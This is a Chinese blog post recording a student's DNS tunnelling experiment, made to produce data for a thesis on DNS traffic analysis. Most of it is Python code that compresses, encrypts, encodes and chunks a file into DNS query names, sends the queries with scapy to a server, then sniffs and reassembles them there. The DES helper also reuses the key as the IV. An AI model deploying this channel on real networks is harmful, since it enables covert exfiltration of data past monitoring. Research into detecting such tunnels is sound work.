DNS隧道攻击实验记录

到博主做毕设的时间了,因为博主毕设方向的需要的数据集,很少有公开提供(毕竟DNS的记录多多少少带点隐私问题),所以不得不自己模拟DNS攻击来进行操作。
首先要了解啥是DNS隧道攻击的话,可以看一下咱家之前的博文DNS流量分析领域调研。这边就懒得再写一遍了。在之前的搭建子域DNS服务器Ubuntu搭建DNS服务器中,已经把大致的环境搭建完成了,这里直接开始隧道攻击程序的记录。

攻击方案

这里希望的是能够通过DNS报文来传输文件。
在客户端方面,存在以下几个模块,分别是文件读入模块,编码模块,嵌入模块和发送模块,在服务器端,有以下模块,分别为报文接收,内容提取,文件恢复模块,在此外,另附一配置模块,用于设置各项参数,如最大报文长度,编码方式等。

控制模块

我使用json文件来实现控制模块,该模块分为两部分,分别为内容,域名格式。如下所示
DNS隧道攻击实验记录

编码模块

在该模块,我设置了三种选项,分别是是否压缩,是否加密和编码,前两个是可选项,最后一个是必选项。

def content_conversion(set_content,data):

    if set_content["compress_or_not"] == 1:
        data = compress(data)
    #print(data)
    if set_content["encrypt_mode"]["active"] == 1:
        data = encode_decode.Encrypt(data,set_content["encrypt_mode"]["method"],set_content["encrypt_mode"]["key"])

    data = encode_decode.Encode(data,set_content["encode_method"]['method'])
    return data

对于压缩,我选择直接调用zlib库来完成

def compress(data):
    res = zlib.compress(data,zlib.Z_BEST_COMPRESSION)
    return res
 
 def decompress(data):
    zobj = zlib.decompressobj()
    data = zobj.decompress(data)
    #res = data.decode(encoding='utf-8')
    return data

而对于加密,可选的有AES加密,DES加密和3DES加密等方法。目前只实现了DES加密。

def des_encrypt( key, plaintext):
    iv = secret_key = key
    k = pyDes.des(secret_key, pyDes.CBC, iv, pad=None, padmode = pyDes.PAD_PKCS5)
    data = k.encrypt(plaintext, padmode=pyDes.PAD_PKCS5)
    res=binascii.b2a_hex(data)
    return res
    
def des_decrypt( key, ciphertext):
    iv = secret_key = key
    k = pyDes.des(secret_key, pyDes.CBC, iv, pad=None, padmode = pyDes.PAD_PKCS5)
    data = k.decrypt(binascii.a2b_hex(ciphertext), padmode=pyDes.PAD_PKCS5)
    return data
    
def Encrypt(content,mode,password):
    res=''
    if mode == "DES":
        while len(password)<8:
            password=password+password
        key = password[:8]
        res = des_encrypt(key,content)
    return res

def Decrypt(content,mode,password):
    res=None
    if mode == "DES":
        while len(password)<8:
            password=password+password
        key = password[:8]
        res = des_decrypt(key,content)
    return res

最后是编码部分,常见的编码方法诸如Base32,Base16和Base64_URL等编码方法。

def Encode(inf, ch='base32'):
    rnt=''
    if ch == 'base32':
        rnt = base64.b32encode(inf)
    if ch == 'base16':
        rnt = base64.b16encode(inf)
    if ch == 'base64url':
        rnt = base64.urlsafe_b64encode(inf)
    return rnt

def Decode(inf, ch='base32'):
    rnt=''
    if ch == 'base32':
        rnt = base64.b32decode(inf)
    if ch == 'base16':
        rnt = base64.b16decode(inf)
    if ch == 'base64url':
        rnt = base64.urlsafe_b64decode(inf)
    return rnt

信息嵌入

在信息嵌入阶段,需要将信息分块处理,再加上其他的伪装项。

def make_domain(format,SLD='test.com',inf=None,max_label=63,seq_number=0,tot_seq_number=0,guid_name='test_str',
                file_name='test_name',file_type='txt'):
    labels=format.split('.')
    content={'system_ID','file_name','seq_number','rand','target_content','tot_seq_number','GUID',}
    subdomain=''
    l=''
    for label in labels:
        l=''
        label0s=label.split('<')
        for label0 in label0s:
            label1s=label0.split('>')
            for label1 in label1s:
                if label1 not in content:
                    l=l+label1
                    continue
                if label1 =='GUID':
                    l=l+uuid.uuid3(uuid.NAMESPACE_DNS,guid_name).hex
                    continue
                if label1 == 'target_content' and inf != None:
                    l=l+inf
                    continue
                if label1 == 'file_name':
                    l=l+file_name
                    continue
                if label1 == 'seq_number':
                    l=l+str(seq_number)
                    continue
                if label1 == 'rand':
                    Randint=random.randint(1,max_label)
                    Randstr=''.join(random.sample(string.ascii_letters + string.digits, Randint))
                    l=l+Randstr
                if label1 == 'tot_seq_number':
                    l = l + str(tot_seq_number)
                if label1 == 'system_ID':
                    l = l + uuid.uuid1().hex
                if label1 == 'file_type':
                    l = l + file_type
        if len(l)>max_label:
            print("ERROR: Label",label," Size is larger than MAX_LABEL SIZE", max_label)
            #return None
        subdomain = subdomain + l + '.'
    domain = subdomain + SLD
    if (len(domain)>253):
        print("ERROR: Size of Domain is larger than 253")
        #return None
    return domain

发送模块

我选择使用scapy来完成信息的发送,用scapy可以非常轻松,明确的构造包并进行发送,且不用理会应答包。

from scapy.all import *

def dns_request(Domain,Dst,Dst_port=53):
    a = IP(dst=Dst)
    b = UDP(dport = Dst_port)
    c =  DNS(id=1,qr=0,opcode=0,tc=0,rd=1,qdcount=1,ancount=0,nscount=0,arcount=0)
    c.qd = DNSQR(qname=Domain,qtype='A',qclass=1)
    p = a/b/c
    send(p)

接收报文

可以直接使用scapy的sniff函数来实时嗅探包,并对每个包进行实时操作

sniff(prn=cap, filter='udp and udp port 53')

信息提取

我仅提取嵌入信息,这里不对其余辅助信息部分进行处理。提取出的信息保存到一个字典中。

def cap(packet):
    a = packet.summary()
    layers = a.split('/')
    DNS = layers[len(layers) - 1]
    fields = DNS.split(' ')
    DNSQR = None
    for i in range(len(fields)):
        if (fields[i] == 'Qry'):
            DNSQR = fields[i + 1]
            break
    if DNSQR == None:
        return
    Domain = DNSQR.lstrip('\"b\'').rstrip('\'\"')
    if set_options["domain_structure"]["SLD"] not in Domain:
        return
    content = split_domain(Domain, set_options['domain_structure']['format'])

    if set_options["content"]["encode_method"]['active'] == 1:
        content = Decode(content, set_options["content"]["encode_method"]['method']).decode()
    print(content)
    options = content.split('|!|')
    # print(len(options),options)
    if len(options) == 4 and options[2] == 'REG':
        # print(content)
        jobid = options[0]
        file_name = options[1]
        checksum = options[3]
        packets_dict[jobid] = {'filename': file_name.replace('_', '.'), 'checksum': checksum, 'contents': []}
    elif len(options) == 3 and options[2] == 'DONE':
        mkdir(packets_dict[options[0]], set_options)
    elif len(options) == 3:
        packets_dict[options[0]]['contents'].append([options[0], int(options[1]), options[2]])

文件重构

对文件的重构,我通过jobid来确认是哪个文件

	filename = job['filename']
    checksum = job['checksum']
    contents = job['contents']
    contents.sort(reverse = False,key=lambda x:x[1])
    ct=0
    Data=''
    set_encode=set_options['content']["encode_method"]
    #print(job['contents'])
    for content in contents:
        tmp=content[2].replace('\n','')
        if int(content[1])>ct+1:
            print('[ERROR] %s lose pocket %d .'%(content[0],ct+1))
            return
        if int(content[1])<ct+1:
            continue

        Data=Data+tmp
        ct = int(content[1])
    if (hash_md5(Data)!=checksum):
        print("[Error] There is something wrong in the data")
        return
    Data = de_content_conversion(Data, set_options['content'])

    print('[OK] %s is Done.'%(content[0]))
    f_out = open(filename, 'wb')
    f_out.write(Data.encode())
    f_out.close()

实验记录

DNS隧道攻击实验记录

DNS隧道攻击实验记录

上一篇:《C++ Primer》第16章 16.5节习题答案


下一篇:Vue使用Antv F2